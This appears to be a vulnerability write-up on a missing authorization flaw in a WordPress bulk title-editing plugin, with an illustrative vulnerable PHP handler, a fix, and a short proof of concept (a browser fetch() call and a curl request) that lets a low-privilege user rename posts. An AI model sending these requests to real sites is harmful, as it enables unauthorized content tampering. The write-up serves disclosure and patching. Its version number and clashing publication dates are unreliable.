CVE-2023-49754 - Exploiting Missing Authorization in “Bulk Edit Post Titles” Plugin for WordPress

Published: June 2024
Vulnerability Score: Critical
Affected Plugin: Bulk Edit Post Titles by Yogesh Pawar, Clarion Technologies (All versions up to 5..)

Quick Summary

The WordPress plugin “Bulk Edit Post Titles” (versions through 5..) contains a missing authorization flaw (CVE-2023-49754). This allows any logged-in user to bulk-edit post titles, regardless of their permissions. Improper access control leads to unauthorized content manipulation, which can compromise the integrity of WordPress sites.

How Does CVE-2023-49754 Happen?

The plugin's core feature—editing many post titles at once—should only be available to users with appropriate privileges, typically administrators or editors. Unfortunately, due to the missing authorization checks, _any_ logged-in user (even subscribers) can send requests to the plugin's core endpoints and mass update post titles.

Suppose the plugin adds an AJAX action in its functions.php or a similar file

add_action('wp_ajax_bulk_edit_post_titles', 'bulk_edit_post_titles_handler');

function bulk_edit_post_titles_handler() {
    // EXPECTED: check_user_permissions() <--- MISSING!
    $titles = $_POST['titles']; // Array: [post_id => new_title]
    foreach ($titles as $post_id => $new_title) {
        wp_update_post([
            'ID' => intval($post_id),
            'post_title' => sanitize_text_field($new_title),
        ]);
    }
    wp_send_json_success('Titles updated!');
}

What’s Missing?
The handler above should verify that the current user has an appropriate capability like edit_others_posts. Without this, any logged-in user can change post titles via AJAX!

Proof-of-Concept (PoC) Exploit

Using the browser’s Developer Console or a simple script (e.g., via Curl or Burp Suite), a low-privilege user can send the following AJAX request:

// JavaScript example (run in browser console when logged in as Subscriber)
fetch('/wp-admin/admin-ajax.php', {
    method: 'POST',
    headers: {'Content-Type': 'application/x-www-form-urlencoded'},
    body: 'action=bulk_edit_post_titles&titles[123]=Owned+by+Hacker'
}).then(res => res.text()).then(console.log);

Or, using Curl in Terminal

curl -X POST \
  -b "wordpress_logged_in_[cookie_here]" \
  -d "action=bulk_edit_post_titles&titles[123]=Hacked+Title" \
  https://vulnerable-site.com/wp-admin/admin-ajax.php

(Replace [cookie_here] with your own cookie value to simulate an authenticated session)

Result:
The post with ID 123 now has its title updated — no matter the logged-in user’s role!

Original References

- WPScan Vulnerability Database Entry
- NVD Entry for CVE-2023-49754
- Plugin Official Page

Fix and Mitigation

Plugin Authors:

To fix the issue, always check user capability

function bulk_edit_post_titles_handler() {
    if ( ! current_user_can( 'edit_others_posts' ) ) {
        wp_send_json_error('You are not allowed to do this', 403);
        return;
    }
    // Continue with safe updates...
}

Conclusion

CVE-2023-49754 is a critical and easy-to-exploit flaw that affects thousands of WordPress sites using “Bulk Edit Post Titles.” Don’t wait for the attackers — update or disable the plugin now and follow the ongoing advisories for future patches.

Stay secure. Audit your plugins!

If you found this post helpful, consider sharing with your WordPress community or reporting other plugin issues for responsible disclosure.

Timeline

Published on: 12/09/2024 13:15:35 UTC